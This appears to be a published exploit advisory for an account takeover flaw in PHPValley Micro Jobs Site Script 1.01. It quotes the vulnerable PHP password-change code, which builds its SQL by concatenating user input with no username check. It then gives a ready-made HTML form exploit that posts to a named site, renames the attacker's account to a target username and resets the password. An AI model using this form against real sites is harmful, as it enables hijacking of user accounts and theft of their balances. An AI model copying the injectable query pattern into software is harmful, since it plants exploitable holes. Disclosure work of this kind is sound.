Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: PHPValley Micro Jobs Site Script 1.01
Vendor URL: http://phpvalley.com/
Demo: http://phpvalley.com/demo
Account Takeover Vulnerability
This vulnerability allows users to edit their username, which the script
doesn't account for. Editing your username to that of a current user allows
the attacker to takeover their account, including using or depositing their
balance.
The vulnerability exists in php/change_pass_content.php:
if (isset($_POST['changepass']))
{
$cpass=md5($_POST['cpass']);
$npass=trim($_POST['npass']);
$npassc=trim($_POST['npassc']);
$username=trim(strtolower($_POST['auser']));
if($npass == $npassc && !empty($npass)){
$query = "UPDATE members SET username='".$username."',
password='".md5(strtolower($npass))."' where
username='".$_SESSION['userName']."' and password='$cpass'";
This code doesn't validate the username that is being updated. SQL
injection might also be possible, but the length is limited here.
Exploit:
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
<input name="npass" type="hidden" value="jacked" />
<input name="npassc" type="hidden" value="jacked" />
<input type="submit" value="Jack" />
</form>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information